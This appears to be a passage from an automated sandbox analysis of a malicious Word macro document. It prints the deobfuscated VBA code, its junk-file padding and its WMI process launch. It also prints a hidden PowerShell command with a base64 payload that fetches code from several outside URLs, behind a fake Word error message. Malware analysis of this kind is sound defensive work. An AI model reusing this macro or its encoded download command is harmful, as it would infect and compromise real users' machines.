wBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
V2enhc4htwl7z6bh
Thriap3q9rgf3yy9y
zZuzBZGD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
OIbfvEEFF
Close
eLmLDU
FYVZFEH
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hoyzuBGCP
Close
lADFBaJ

Strings	Decrypted Strings
"Jsnt2t9fi0a8nnsiaf""Bete9x47doew46v"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC"
"VrVKCjefsIJ"
"sxbwAfRtWJI"
"WLXLJnjItPGPZJ"
"]anw[3""p]anw[3"
"]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF"
"ImJJdfAtdFHCh"
"deVdMyoREdgzCaJb"
"XZzpBRpDKuMgsGHIHF"
"]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf"
"uTtCAFwHpCGF"
"lwWhZGEasjsS"
"MiCjaGqJfPrI"
"w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"HQGixyC:\vETCeBG\zIuEqsGG.NobmDA"
"dXFPCSYtSNB"
"KqVyuQQfwTWh"
"qDaYIDDSZQMTaO"
"]anw[3""]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ"
"MxCpGaGqBgemCAFEJ"
"hbtzFRJEXyDCXI"
"zdTcdOoXXUFHJK"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo"
"hKlajOujwgDFAA"
"JMgUDAIEJlgyNBH"
"BUUJYAAIoJvLBLAo"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ"
"CVbRCAAhkhmcDG"
"XrrAwQZPjqB"
"fxSJajCGlWUEBW"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD"
"qiXBsMBsLJGbX"
"mehEFPFHcklgJDDx"
"BndJDkuVYF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH"
"JTSPCDjykfL"
"bBmgOCvPPojGGC"
"anBQXljzGenE"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"pGMMG:\enlVVB\fMqiFP.kEIECDZHz"
"dnUnKFHAkIOdD"
"ekluIEBJFIgoBcGC"
"BnxHFzJCGhVHrFIm"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW"
"fDdPHEjBEnAdZqZFJ"
"wypNISsWSXthFJCq"
"LvnHAGHfIhRDBRAF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA"
"DBvMcNtCcMyJDDI"
"eXpjHFapHaPdRJu"
"eXObOTlBAITEOIo"

Line	Instruction	Meta Information
2	Function G8xesq0b8jlsfrsp()
3	On Error Resume Next	executed
4	Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
5	sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89	Zw1k7hcmdl66 Item Hyii7r76oq89
6	Goto SblcDCC
7	Dim pULquU as Object
8	Set ibIiBF = diCXTi	diCXTi
9	Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
10	Dim SblcDCC as Object
11	Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	CreateTextFile
12	SblcDCC.WriteLine "VrVKCjefsIJ"	WriteLine
13	SblcDCC.WriteLine "sxbwAfRtWJI"	WriteLine
14	SblcDCC.WriteLine "WLXLJnjItPGPZJ"	WriteLine
15	Set jbUmDI = NZiApKAp	NZiApKAp
16	SblcDCC.Close	Close
17	Set pULquU = Nothing
18	Set MznOjBB = vrYYHIDxI	vrYYHIDxI
19	Set SblcDCC = Nothing
19	SblcDCC:
21	t3s = "]anw[3" + "p]anw[3"
22	K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
23	Goto fNhiCVgGS
24	Dim RyDBDK as Object
25	Set WTbkNqFa = gzTFLxb	gzTFLxb
26	Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
27	Dim fNhiCVgGS as Object
28	Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	CreateTextFile
29	fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"	WriteLine
30	fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"	WriteLine
31	fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"	WriteLine
32	Set OlapGi = PjNhJNA	PjNhJNA
33	fNhiCVgGS.Close	Close
34	Set RyDBDK = Nothing
35	Set yabVbA = oAaNlB	oAaNlB
36	Set fNhiCVgGS = Nothing
36	fNhiCVgGS:
38	Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
39	Goto HCvCmAcHC
40	Dim iFTmFHFH as Object
41	Set UDSpFHqFJ = sySRJ	sySRJ
42	Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
43	Dim HCvCmAcHC as Object
44	Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	CreateTextFile
45	HCvCmAcHC.WriteLine "uTtCAFwHpCGF"	WriteLine
46	HCvCmAcHC.WriteLine "lwWhZGEasjsS"	WriteLine
47	HCvCmAcHC.WriteLine "MiCjaGqJfPrI"	WriteLine
48	Set MmSDYCkJR = UwyYSBsBN	UwyYSBsBN
49	HCvCmAcHC.Close	Close
50	Set iFTmFHFH = Nothing
51	Set EISYDDB = tpOgXmm	tpOgXmm
52	Set HCvCmAcHC = Nothing
52	HCvCmAcHC:
54	Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
55	Goto gEcrV
56	Dim RqlOZAHRJ as Object
57	Set jsYAGBJAF = MHYlQAD	MHYlQAD
58	Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
59	Dim gEcrV as Object
60	Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	CreateTextFile
61	gEcrV.WriteLine "dXFPCSYtSNB"	WriteLine
62	gEcrV.WriteLine "KqVyuQQfwTWh"	WriteLine
63	gEcrV.WriteLine "qDaYIDDSZQMTaO"	WriteLine
64	Set IePCGy = GznGGHyG	GznGGHyG
65	gEcrV.Close	Close
66	Set RqlOZAHRJ = Nothing
67	Set cwsTFPCH = bbsIZ	bbsIZ
68	Set gEcrV = Nothing
68	gEcrV:
70	Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"	Mid Name Application
71	Goto ZMdrVHGz
72	Dim xsruLB as Object
73	Set fiyQuiRBI = swNGWdd	swNGWdd
74	Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
75	Dim ZMdrVHGz as Object
76	Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	CreateTextFile
77	ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"	WriteLine
78	ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"	WriteLine
79	ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"	WriteLine
80	Set xPBGH = rJEkbLH	rJEkbLH
81	ZMdrVHGz.Close	Close
82	Set xsruLB = Nothing
83	Set dLRiF = vEBqHrDnD	vEBqHrDnD
84	Set ZMdrVHGz = Nothing
84	ZMdrVHGz:
86	K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
87	Goto fDZVKAAc
88	Dim tzErBRFe as Object
89	Set SeHafBC = tWcKo	tWcKo
90	Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
91	Dim fDZVKAAc as Object
92	Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	CreateTextFile
93	fDZVKAAc.WriteLine "hKlajOujwgDFAA"	WriteLine
94	fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"	WriteLine
95	fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"	WriteLine
96	Set CHVmaVC = LzxxRHG	LzxxRHG
97	fDZVKAAc.Close	Close
98	Set tzErBRFe = Nothing
99	Set WlBWDXGD = EKezHIC	EKezHIC
100	Set fDZVKAAc = Nothing
100	fDZVKAAc:
102	Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
103	Goto rYbgBh
104	Dim hZCth as Object
105	Set LQqlBAHD = DpYbmDA	DpYbmDA
106	Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
107	Dim rYbgBh as Object
108	Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	CreateTextFile
109	rYbgBh.WriteLine "CVbRCAAhkhmcDG"	WriteLine
110	rYbgBh.WriteLine "XrrAwQZPjqB"	WriteLine
111	rYbgBh.WriteLine "fxSJajCGlWUEBW"	WriteLine
112	Set phIwFD = hDJDJ	hDJDJ
113	rYbgBh.Close	Close
114	Set hZCth = Nothing
115	Set PnolTIbAB = dXiwA	dXiwA
116	Set rYbgBh = Nothing
116	rYbgBh:
118	Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)	CreateObject("winmgmts:win32_process") executed
119	Goto GfRPP
120	Dim xLQtMd as Object
121	Set uRnkDGJ = hFSyAfFrF	hFSyAfFrF
122	Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
123	Dim GfRPP as Object
124	Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	CreateTextFile
125	GfRPP.WriteLine "qiXBsMBsLJGbX"	WriteLine
126	GfRPP.WriteLine "mehEFPFHcklgJDDx"	WriteLine
127	GfRPP.WriteLine "BndJDkuVYF"	WriteLine
128	Set xiFRA = hXxQDACJA	hXxQDACJA
129	GfRPP.Close	Close
130	Set xLQtMd = Nothing
131	Set jENfzNH = xkQqDXCcD	xkQqDXCcD
132	Set GfRPP = Nothing
132	GfRPP:
134	Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))	Mid Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]